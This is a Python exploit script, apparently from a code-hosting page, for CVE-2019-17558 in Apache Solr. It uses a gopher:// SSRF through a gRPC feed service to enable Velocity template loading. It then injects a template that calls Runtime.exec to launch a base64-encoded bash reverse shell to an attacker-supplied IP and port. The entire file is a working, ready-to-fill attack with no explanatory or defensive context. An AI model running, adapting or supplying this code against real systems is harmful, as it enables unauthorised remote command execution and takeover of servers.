/
CVE-2019-17558-_custom_payload
50 lines (39 loc) · 1.86 KB
/
CVE-2019-17558-_custom_payload
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import sys,pickle,base64,subprocess
payload = 'bash -c {echo,' + base64.b64encode("bash -i >& /dev/tcp/[yourip]/[yourport] 0>&1").replace('+','%2b') + '}|{base64,-d}|{bash,-i}'
def send_url(url):
feed_url = '{"feed_url": "gopher://localhost:8983/_' + url + '"}'
print(feed_url)
feed_url_b64 = base64.b64encode(pickle.dumps(feed_url))
cmd = '/root/Downloads/laser/grpcurl -max-time 5 -plaintext -proto laser.proto -d \'{"data":"' + feed_url_b64 + '"}\' [targetip]:[targetport] Print.Feed'
subprocess.call(cmd,shell=True)
### ENCODE URL
def enc(data):
return str(data.replace('%','%25').replace('\n','%0d%0a').replace('"','\\"'))
def url_get(header,req):
send_url(enc(req) + enc(header))
def url_post(header,body):
send_url(enc(header) + "%0d%0a%0d%0a" + enc(body)) # header + 2*CRLF + body
### POST REQUEST
body = """
{
"update-queryresponsewriter": {
"startup": "lazy",
"name": "velocity",
"class": "solr.VelocityResponseWriter",
"template.base.dir": "",
"solr.resource.loader.enabled": "true",
"params.resource.loader.enabled": "true"
}
}""".strip().replace('\n','').replace('','')
header = """
POST /solr/staging/config HTTP/1.1
Host: localhost:8983
Content-Type: application/json
Content-Length: {}
""".format(len(body)).strip()
url_post(header,body)
### GET REQUEST
header = 'HTTP/1.1\nHost: localhost:8983\n'
template = '%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec("PAYLOAD"))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end'
req = 'GET /solr/staging/select?q=1&&wt=velocity&v.template=custom&v.template.custom=' + template.replace('PAYLOAD',payload).replace(' ','%20')
url_get(header,req)